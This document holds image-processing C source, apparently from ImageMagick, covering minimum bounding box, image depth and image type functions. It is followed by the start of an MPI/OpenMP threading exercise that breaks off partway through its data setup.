static inline double getProjection(PointInfo *p,PointInfo *q,PointInfo *v)
{
double
distance;
/*
Projection of vector (x,y) - p into a line passing through p and q.
*/
distance=getDistance(p,q);
if (distance < MagickEpsilon)
return(INFINITY);
return((q->x-p->x)*(v->x-p->x)+(v->y-p->y)*(q->y-p->y))/sqrt(distance);
}
static inline double getFeretDiameter(PointInfo *p,PointInfo *q,PointInfo *v)
{
double
distance;
/*
Distance from a point (x,y) to a line passing through p and q.
*/
distance=getDistance(p,q);
if (distance < MagickEpsilon)
return(INFINITY);
return((q->x-p->x)*(v->y-p->y)-(v->x-p->x)*(q->y-p->y))/sqrt(distance);
}
MagickExport PointInfo *GetImageMinimumBoundingBox(Image *image,
size_t *number_vertices,ExceptionInfo *exception)
{
CaliperInfo
caliper_info;
const char
*artifact;
double
angle,
diameter,
distance;
PointInfo
*bounding_box,
*vertices;
ssize_t
i;
size_t
number_hull_vertices;
/*
Generate the minimum bounding box with the "Rotating Calipers" algorithm.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
*number_vertices=0;
vertices=GetImageConvexHull(image,&number_hull_vertices,exception);
if (vertices == (PointInfo *) NULL)
return((PointInfo *) NULL);
*number_vertices=4;
bounding_box=(PointInfo *) AcquireQuantumMemory(*number_vertices,
sizeof(*bounding_box));
if (bounding_box == (PointInfo *) NULL)
{
vertices=(PointInfo *) RelinquishMagickMemory(vertices);
return((PointInfo *) NULL);
}
caliper_info.area=2.0*image->columns*image->rows;
caliper_info.width=(double) image->columns+image->rows;
caliper_info.height=0.0;
caliper_info.projection=0.0;
caliper_info.p=(-1);
caliper_info.q=(-1);
caliper_info.v=(-1);
for (i=0; i < (ssize_t) number_hull_vertices; i++)
{
double
area = 0.0,
max_projection = 0.0,
min_diameter = -1.0,
min_projection = 0.0;
ssize_t
j,
k;
ssize_t
p = -1,
q = -1,
v = -1;
for (j=0; j < (ssize_t) number_hull_vertices; j++)
{
diameter=fabs(getFeretDiameter(&vertices[i],
&vertices[(i+1) % number_hull_vertices],&vertices[j]));
if (min_diameter < diameter)
{
min_diameter=diameter;
p=i;
q=(i+1) % number_hull_vertices;
v=j;
}
}
for (k=0; k < (ssize_t) number_hull_vertices; k++)
{
double
projection;
/*
Rotating calipers.
*/
projection=getProjection(&vertices[p],&vertices[q],&vertices[k]);
min_projection=MagickMin(min_projection,projection);
max_projection=MagickMax(max_projection,projection);
}
area=min_diameter*(max_projection-min_projection);
if (caliper_info.area > area)
{
caliper_info.area=area;
caliper_info.width=min_diameter;
caliper_info.height=max_projection-min_projection;
caliper_info.projection=max_projection;
caliper_info.p=p;
caliper_info.q=q;
caliper_info.v=v;
}
}
/*
Initialize minimum bounding box.
*/
diameter=getFeretDiameter(&vertices[caliper_info.p],
&vertices[caliper_info.q],&vertices[caliper_info.v]);
angle=atan2(vertices[caliper_info.q].y-vertices[caliper_info.p].y,
vertices[caliper_info.q].x-vertices[caliper_info.p].x);
bounding_box[0].x=vertices[caliper_info.p].x+cos(angle)*
caliper_info.projection;
bounding_box[0].y=vertices[caliper_info.p].y+sin(angle)*
caliper_info.projection;
bounding_box[1].x=floor(bounding_box[0].x+cos(angle+MagickPI/2.0)*diameter+
0.5);
bounding_box[1].y=floor(bounding_box[0].y+sin(angle+MagickPI/2.0)*diameter+
0.5);
bounding_box[2].x=floor(bounding_box[1].x+cos(angle)*(-caliper_info.height)+
0.5);
bounding_box[2].y=floor(bounding_box[1].y+sin(angle)*(-caliper_info.height)+
0.5);
bounding_box[3].x=floor(bounding_box[2].x+cos(angle+MagickPI/2.0)*(-diameter)+
0.5);
bounding_box[3].y=floor(bounding_box[2].y+sin(angle+MagickPI/2.0)*(-diameter)+
0.5);
/*
Export minimum bounding box properties.
*/
(void) FormatImageProperty(image,"minimum-bounding-box:area","%.*g",
GetMagickPrecision(),caliper_info.area);
(void) FormatImageProperty(image,"minimum-bounding-box:width","%.*g",
GetMagickPrecision(),caliper_info.width);
(void) FormatImageProperty(image,"minimum-bounding-box:height","%.*g",
GetMagickPrecision(),caliper_info.height);
(void) FormatImageProperty(image,"minimum-bounding-box:_p","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.p].x,
GetMagickPrecision(),vertices[caliper_info.p].y);
(void) FormatImageProperty(image,"minimum-bounding-box:_q","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.q].x,
GetMagickPrecision(),vertices[caliper_info.q].y);
(void) FormatImageProperty(image,"minimum-bounding-box:_v","%.*g,%.*g",
GetMagickPrecision(),vertices[caliper_info.v].x,
GetMagickPrecision(),vertices[caliper_info.v].y);
/*
Find smallest angle to origin.
*/
distance=hypot(bounding_box[0].x,bounding_box[0].y);
angle=getAngle(&bounding_box[0],&bounding_box[1]);
for (i=1; i < 4; i++)
{
double d = hypot(bounding_box[i].x,bounding_box[i].y);
if (d < distance)
{
distance=d;
angle=getAngle(&bounding_box[i],&bounding_box[(i+1) % 4]);
}
}
artifact=GetImageArtifact(image,"minimum-bounding-box:orientation");
if (artifact != (const char *) NULL)
{
double
length,
q_length,
p_length;
PointInfo
delta,
point;
/*
Find smallest perpendicular distance from edge to origin.
*/
point=bounding_box[0];
for (i=1; i < 4; i++)
{
if (bounding_box[i].x < point.x)
point.x=bounding_box[i].x;
if (bounding_box[i].y < point.y)
point.y=bounding_box[i].y;
}
for (i=0; i < 4; i++)
{
bounding_box[i].x-=point.x;
bounding_box[i].y-=point.y;
}
for (i=0; i < 4; i++)
{
double
d,
intercept,
slope;
delta.x=bounding_box[(i+1) % 4].x-bounding_box[i].x;
delta.y=bounding_box[(i+1) % 4].y-bounding_box[i].y;
slope=delta.y*PerceptibleReciprocal(delta.x);
intercept=bounding_box[(i+1) % 4].y-slope*bounding_box[i].x;
d=fabs((slope*bounding_box[i].x-bounding_box[i].y+intercept)*
PerceptibleReciprocal(sqrt(slope*slope+1.0)));
if ((i == 0) || (d < distance))
{
distance=d;
point=delta;
}
}
angle=RadiansToDegrees(atan(point.y*PerceptibleReciprocal(point.x)));
length=hypot(point.x,point.y);
p_length=fabs((double) MagickMax(caliper_info.width,caliper_info.height)-
length);
q_length=fabs(length-(double) MagickMin(caliper_info.width,
caliper_info.height));
if (LocaleCompare(artifact,"landscape") == 0)
{
if (p_length > q_length)
angle+=(angle < 0.0) ? 90.0 : -90.0;
}
else
if (LocaleCompare(artifact,"portrait") == 0)
{
if (p_length < q_length)
angle+=(angle >= 0.0) ? 90.0 : -90.0;
}
}
(void) FormatImageProperty(image,"minimum-bounding-box:angle","%.*g",
GetMagickPrecision(),angle);
(void) FormatImageProperty(image,"minimum-bounding-box:unrotate","%.*g",
GetMagickPrecision(),-angle);
vertices=(PointInfo *) RelinquishMagickMemory(vertices);
return(bounding_box);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e Q u a n t u m D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageQuantumDepth() returns the depth of the image rounded to a legal
% quantum depth: 8, 16, or 32.
%
% The format of the GetImageQuantumDepth method is:
%
% size_t GetImageQuantumDepth(const Image *image,
% const MagickBooleanType constrain)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o constrain: A value other than MagickFalse, constrains the depth to
% a maximum of MAGICKCORE_QUANTUM_DEPTH.
%
*/
MagickExport size_t GetImageQuantumDepth(const Image *image,
const MagickBooleanType constrain)
{
size_t
depth;
depth=image->depth;
if (depth <= 8)
depth=8;
else
if (depth <= 16)
depth=16;
else
if (depth <= 32)
depth=32;
else
if (depth <= 64)
depth=64;
if (constrain != MagickFalse)
depth=(size_t) MagickMin((double) depth,(double) MAGICKCORE_QUANTUM_DEPTH);
return(depth);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% G e t I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% GetImageType() returns the type of image:
%
% Bilevel Grayscale GrayscaleMatte
% Palette PaletteMatte TrueColor
% TrueColorMatte ColorSeparation ColorSeparationMatte
%
% The format of the GetImageType method is:
%
% ImageType GetImageType(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport ImageType GetImageType(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->colorspace == CMYKColorspace)
{
if (image->alpha_trait == UndefinedPixelTrait)
return(ColorSeparationType);
return(ColorSeparationAlphaType);
}
if (IsImageMonochrome(image) != MagickFalse)
return(BilevelType);
if (IsImageGray(image) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(GrayscaleAlphaType);
return(GrayscaleType);
}
if (IsPaletteImage(image) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(PaletteAlphaType);
return(PaletteType);
}
if (image->alpha_trait != UndefinedPixelTrait)
return(TrueColorAlphaType);
return(TrueColorType);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e G r a y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageGray() returns grayscale if all the pixels in the image have
% the same red, green, and blue intensities, and bi-level is the intensity is
% either 0 or QuantumRange. Otherwise undefined is returned.
%
% The format of the IdentifyImageGray method is:
%
% ImageType IdentifyImageGray(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ImageType IdentifyImageGray(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
ImageType
type;
const Quantum
*p;
ssize_t
x;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if ((image->type == BilevelType) || (image->type == GrayscaleType) ||
(image->type == GrayscaleAlphaType))
return(image->type);
if (IssRGBCompatibleColorspace(image->colorspace) == MagickFalse)
return(UndefinedType);
type=BilevelType;
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (IsPixelGray(image,p) == MagickFalse)
{
type=UndefinedType;
break;
}
if ((type == BilevelType) &&
(IsPixelMonochrome(image,p) == MagickFalse))
type=GrayscaleType;
p+=GetPixelChannels(image);
}
if (type == UndefinedType)
break;
}
image_view=DestroyCacheView(image_view);
if ((type == GrayscaleType) && (image->alpha_trait != UndefinedPixelTrait))
type=GrayscaleAlphaType;
return(type);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e M o n o c h r o m e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageMonochrome() returns MagickTrue if all the pixels in the image
% have the same red, green, and blue intensities and the intensity is either
% 0 or QuantumRange.
%
% The format of the IdentifyImageMonochrome method is:
%
% MagickBooleanType IdentifyImageMonochrome(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType IdentifyImageMonochrome(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
bilevel;
ssize_t
x;
const Quantum
*p;
ssize_t
y;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->type == BilevelType)
return(MagickTrue);
if (IssRGBCompatibleColorspace(image->colorspace) == MagickFalse)
return(MagickFalse);
bilevel=MagickTrue;
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (IsPixelMonochrome(image,p) == MagickFalse)
{
bilevel=MagickFalse;
break;
}
p+=GetPixelChannels(image);
}
if (bilevel == MagickFalse)
break;
}
image_view=DestroyCacheView(image_view);
return(bilevel);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I d e n t i f y I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IdentifyImageType() returns the potential type of image:
%
% Bilevel Grayscale GrayscaleMatte
% Palette PaletteMatte TrueColor
% TrueColorMatte ColorSeparation ColorSeparationMatte
%
% To ensure the image type matches its potential, use SetImageType():
%
% (void) SetImageType(image,IdentifyImageType(image,exception),exception);
%
% The format of the IdentifyImageType method is:
%
% ImageType IdentifyImageType(const Image *image,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport ImageType IdentifyImageType(const Image *image,
ExceptionInfo *exception)
{
ImageType
type;
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->colorspace == CMYKColorspace)
{
if (image->alpha_trait == UndefinedPixelTrait)
return(ColorSeparationType);
return(ColorSeparationAlphaType);
}
type=IdentifyImageGray(image,exception);
if ((type == BilevelType) || (type == GrayscaleType) ||
(type == GrayscaleAlphaType))
return(type);
if (IdentifyPaletteImage(image,exception) != MagickFalse)
{
if (image->alpha_trait != UndefinedPixelTrait)
return(PaletteAlphaType);
return(PaletteType);
}
if (image->alpha_trait != UndefinedPixelTrait)
return(TrueColorAlphaType);
return(TrueColorType);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e G r a y %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageGray() returns MagickTrue if the type of the image is grayscale or
% bi-level.
%
% The format of the IsImageGray method is:
%
% MagickBooleanType IsImageGray(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport MagickBooleanType IsImageGray(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if ((image->type == BilevelType) || (image->type == GrayscaleType) ||
(image->type == GrayscaleAlphaType))
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e M o n o c h r o m e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageMonochrome() returns MagickTrue if type of the image is bi-level.
%
% The format of the IsImageMonochrome method is:
%
% MagickBooleanType IsImageMonochrome(const Image *image)
%
% A description of each parameter follows:
%
% o image: the image.
%
*/
MagickExport MagickBooleanType IsImageMonochrome(const Image *image)
{
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->type == BilevelType)
return(MagickTrue);
return(MagickFalse);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% I s I m a g e O p a q u e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% IsImageOpaque() returns MagickTrue if none of the pixels in the image have
% an alpha value other than OpaqueAlpha (QuantumRange).
%
% Will return true immediatally is alpha channel is not available.
%
% The format of the IsImageOpaque method is:
%
% MagickBooleanType IsImageOpaque(const Image *image,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType IsImageOpaque(const Image *image,
ExceptionInfo *exception)
{
CacheView
*image_view;
const Quantum
*p;
ssize_t
x;
ssize_t
y;
/*
Determine if image is opaque.
*/
assert(image != (Image *) NULL);
assert(image->signature == MagickCoreSignature);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"%s",image->filename);
if (image->alpha_trait == UndefinedPixelTrait)
return(MagickTrue);
image_view=AcquireVirtualCacheView(image,exception);
for (y=0; y < (ssize_t) image->rows; y++)
{
p=GetCacheViewVirtualPixels(image_view,0,y,image->columns,1,exception);
if (p == (const Quantum *) NULL)
break;
for (x=0; x < (ssize_t) image->columns; x++)
{
if (GetPixelAlpha(image,p) != OpaqueAlpha)
break;
p+=GetPixelChannels(image);
}
if (x < (ssize_t) image->columns)
break;
}
image_view=DestroyCacheView(image_view);
return(y < (ssize_t) image->rows ? MagickFalse : MagickTrue);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e D e p t h %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageDepth() sets the depth of the image.
%
% The format of the SetImageDepth method is:
%
% MagickBooleanType SetImageDepth(Image *image,const size_t depth,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o channel: the channel.
%
% o depth: the image depth.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType SetImageDepth(Image *image,
const size_t depth,ExceptionInfo *exception)
{
CacheView
*image_view;
MagickBooleanType
status;
QuantumAny
range;
ssize_t
y;
assert(image != (Image *) NULL);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"...");
assert(image->signature == MagickCoreSignature);
if (depth >= MAGICKCORE_QUANTUM_DEPTH)
{
image->depth=depth;
return(MagickTrue);
}
range=GetQuantumRange(depth);
if (image->storage_class == PseudoClass)
{
ssize_t
i;
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->colors,1)
#endif
for (i=0; i < (ssize_t) image->colors; i++)
{
if ((GetPixelRedTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].red=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].red),range),range);
if ((GetPixelGreenTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].green=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].green),range),range);
if ((GetPixelBlueTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].blue=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].blue),range),range);
if ((GetPixelAlphaTraits(image) & UpdatePixelTrait) != 0)
image->colormap[i].alpha=(double) ScaleAnyToQuantum(ScaleQuantumToAny(
ClampPixel(image->colormap[i].alpha),range),range);
}
}
status=MagickTrue;
image_view=AcquireAuthenticCacheView(image,exception);
#if !defined(MAGICKCORE_HDRI_SUPPORT)
DisableMSCWarning(4127)
if ((1UL*QuantumRange) <= MaxMap)
RestoreMSCWarning
{
Quantum
*depth_map;
ssize_t
i;
/*
Scale pixels to desired (optimized with depth map).
*/
depth_map=(Quantum *) AcquireQuantumMemory(MaxMap+1,sizeof(*depth_map));
if (depth_map == (Quantum *) NULL)
ThrowFatalException(ResourceLimitFatalError,"MemoryAllocationFailed");
for (i=0; i <= (ssize_t) MaxMap; i++)
depth_map[i]=ScaleAnyToQuantum(ScaleQuantumToAny((Quantum) i,range),
range);
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
x;
Quantum
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,
exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
j;
for (j=0; j < (ssize_t) GetPixelChannels(image); j++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,j);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
q[j]=depth_map[ScaleQuantumToMap(q[j])];
}
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
{
status=MagickFalse;
continue;
}
}
image_view=DestroyCacheView(image_view);
depth_map=(Quantum *) RelinquishMagickMemory(depth_map);
if (status != MagickFalse)
image->depth=depth;
return(status);
}
#endif
/*
Scale pixels to desired depth.
*/
#if defined(MAGICKCORE_OPENMP_SUPPORT)
#pragma omp parallel for schedule(static) shared(status) \
magick_number_threads(image,image,image->rows,1)
#endif
for (y=0; y < (ssize_t) image->rows; y++)
{
ssize_t
x;
Quantum
*magick_restrict q;
if (status == MagickFalse)
continue;
q=GetCacheViewAuthenticPixels(image_view,0,y,image->columns,1,exception);
if (q == (Quantum *) NULL)
{
status=MagickFalse;
continue;
}
for (x=0; x < (ssize_t) image->columns; x++)
{
ssize_t
i;
for (i=0; i < (ssize_t) GetPixelChannels(image); i++)
{
PixelChannel
channel;
PixelTrait
traits;
channel=GetPixelChannelChannel(image,i);
traits=GetPixelChannelTraits(image,channel);
if ((traits & UpdatePixelTrait) == 0)
continue;
q[i]=ScaleAnyToQuantum(ScaleQuantumToAny(ClampPixel((MagickRealType)
q[i]),range),range);
}
q+=GetPixelChannels(image);
}
if (SyncCacheViewAuthenticPixels(image_view,exception) == MagickFalse)
{
status=MagickFalse;
continue;
}
}
image_view=DestroyCacheView(image_view);
if (status != MagickFalse)
image->depth=depth;
return(status);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S e t I m a g e T y p e %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% SetImageType() sets the type of image. Choose from these types:
%
% Bilevel Grayscale GrayscaleMatte
% Palette PaletteMatte TrueColor
% TrueColorMatte ColorSeparation ColorSeparationMatte
% OptimizeType
%
% The format of the SetImageType method is:
%
% MagickBooleanType SetImageType(Image *image,const ImageType type,
% ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o type: Image type.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport MagickBooleanType SetImageType(Image *image,const ImageType type,
ExceptionInfo *exception)
{
const char
*artifact;
ImageInfo
*image_info;
MagickBooleanType
status;
QuantizeInfo
*quantize_info;
assert(image != (Image *) NULL);
if (image->debug != MagickFalse)
(void) LogMagickEvent(TraceEvent,GetMagickModule(),"...");
assert(image->signature == MagickCoreSignature);
status=MagickTrue;
image_info=AcquireImageInfo();
image_info->dither=image->dither;
artifact=GetImageArtifact(image,"dither");
if (artifact != (const char *) NULL)
(void) SetImageOption(image_info,"dither",artifact);
switch (type)
{
case BilevelType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
(void) NormalizeImage(image,exception);
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->number_colors=2;
quantize_info->colorspace=GRAYColorspace;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case GrayscaleType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case GrayscaleAlphaType:
{
status=TransformImageColorspace(image,GRAYColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case PaletteType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if ((image->storage_class == DirectClass) || (image->colors > 256))
{
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->number_colors=256;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
}
image->alpha_trait=UndefinedPixelTrait;
break;
}
case PaletteBilevelAlphaType:
{
ChannelType
channel_mask;
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
channel_mask=SetImageChannelMask(image,AlphaChannel);
(void) BilevelImage(image,(double) QuantumRange/2.0,exception);
(void) SetImageChannelMask(image,channel_mask);
quantize_info=AcquireQuantizeInfo(image_info);
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
break;
}
case PaletteAlphaType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
quantize_info=AcquireQuantizeInfo(image_info);
quantize_info->colorspace=TransparentColorspace;
status=QuantizeImage(quantize_info,image,exception);
quantize_info=DestroyQuantizeInfo(quantize_info);
break;
}
case TrueColorType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case TrueColorAlphaType:
{
status=TransformImageColorspace(image,sRGBColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
if (image->alpha_trait == UndefinedPixelTrait)
(void) SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case ColorSeparationType:
{
status=TransformImageColorspace(image,CMYKColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
image->alpha_trait=UndefinedPixelTrait;
break;
}
case ColorSeparationAlphaType:
{
status=TransformImageColorspace(image,CMYKColorspace,exception);
if (image->storage_class != DirectClass)
status=SetImageStorageClass(image,DirectClass,exception);
if (image->alpha_trait == UndefinedPixelTrait)
status=SetImageAlphaChannel(image,OpaqueAlphaChannel,exception);
break;
}
case OptimizeType:
case UndefinedType:
break;
}
image_info=DestroyImageInfo(image_info);
if (status == MagickFalse)
return(status);
image->type=type;
return(MagickTrue);
}
|
threading-multiple.c | #include <omp.h>
#include "mpi.h"
#include <stdio.h>
void compute_row(int row_index, float input[6][8], float output[6][8])
{
for (int j = 0; j < 8; j = j + 1)
{
/* Here is the 5-point stencil */
const int right_column_index = (j + 1) % 8;
const int left_column_index = (j + 8 - 1) % 8;
const int top_row_index = row_index-1;
const int bottom_row_index = row_index+1;
output[row_index][j] = (input[row_index][j] +
input[row_index][left_column_index] +
input[row_index][right_column_index] +
input[top_row_index][j] +
input[bottom_row_index][j]);
}
}
void report_thread_id(const char *prefix, int step, int rank)
{
int thread_id = omp_get_thread_num();
int num_threads = omp_get_num_threads();
printf("Step %03d: %s: Working on thread id %d of %d on rank %d\n",
step, prefix, thread_id, num_threads, rank);
}
int main(int argc, char **argv)
{
/* ==== CHALLENGE ====
*
* Uncomment the line and fix the MPI call to make this code work!
* We want to use general thread parallelism, so pick a more
* suitable threading mode */
/* Initialize the MPI environment and check */
int provided, required = MPI_THREAD_MULTIPLE;
MPI_Init_thread(NULL, NULL, required, &provided);
MPI_Comm comm = MPI_COMM_WORLD;
/* If the program can't run, stop running */
if (required != provided)
{
printf("Sorry, the MPI library does not provide "
"this threading level! Aborting!\n");
MPI_Abort(comm, 1);
}
int rank, size;
MPI_Comm_rank(comm, &rank);
MPI_Comm_size(comm, &size);
if (size != 2)
{
if (rank == 0)
{
printf("Only two ranks is supported for this exercise, "
"please re-run with two ranks\n");
}
MPI_Finalize();
return 0;
}
/* Prepare the initial values for this process */
float local_data_set[4][8];
printf("Local data set on rank %d was:\n", rank);
for (int i = 0; i < 4; i = i + 1)
{
printf(" [ ");
for (int j = 0; j < 8; j = j + 1)
{
/* Make sure the local data on each rank is different, so
* that we see the communication works properly. */
local_data_set[i][j] = 1*(rank + 1);
if (j != 0)
{
printf(", ");
}
